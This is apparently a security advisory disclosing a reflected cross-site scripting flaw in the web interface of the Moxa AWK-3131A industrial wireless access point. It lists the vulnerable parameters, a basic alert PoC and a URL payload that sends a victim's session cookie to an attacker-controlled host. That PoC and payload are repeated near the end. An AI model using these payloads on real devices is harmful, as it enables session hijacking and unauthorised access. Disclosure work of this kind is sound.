An exploitable reflected Cross-Site Scripting vulnerability exists in the Web Application functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. Specially crafted input, in multiple parameters, can cause a malicious scripts to be executed by a victim.
Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client 1.1
http://www.moxa.com/product/AWK-3131A.htm
7.5 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
An exploitable Reflected Cross-Site Scripting (XSS) vulnerability exists in the Web Application functionality of Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client. Specially crafted input, in multiple parameters, can cause a malicious scripts to be executed by a victim.
The following parameters have been validated as being vulnerable to XSS exploitation: - devIndex parameter in clientlist.asp - devIndex parameter in multiplessidset.asp - index parameter in wirelesscert.asp - vapIndex parameter in wireless_security.asp
In testing, it was possible to inject JavaScript which allowed an attacker to steal legitimate session tokens, allowing the attacker to impersonate an authenticated user.
Basic PoC In multiplessidset.asp, devIndex parameter, JavaScript preceded by ";
and closed with %2f%2f
";alert(1)%2f%2f
Stealing Session Tokens The URL below will send an authenticated user’s valid session token to the attacker:
http://<device IP>//wireless_cert.asp?index=?index=%22%3E%3Cscript%3Ewindow.location=%22http://<attacker IP>/test?cookie=%22.concat%28document.cookie%29%3C/script%3E
To significantly mitigate risk of exploitation, disable the web application before the device is deployed.
Basic PoC In multiplessidset.asp, devIndex parameter, JavaScript preceded by "; and closed with %2f%2f
";alert(1)%2f%2f
Stealing Session Tokens The URL below will send an authenticated user's valid session token to the attacker:
http://<device IP>//wireless_cert.asp?index=?index=%22%3E%3Cscript%3Ewindow.location=%22http://<attacker IP>/test?cookie=%22.concat%28document.cookie%29%3C/script%3E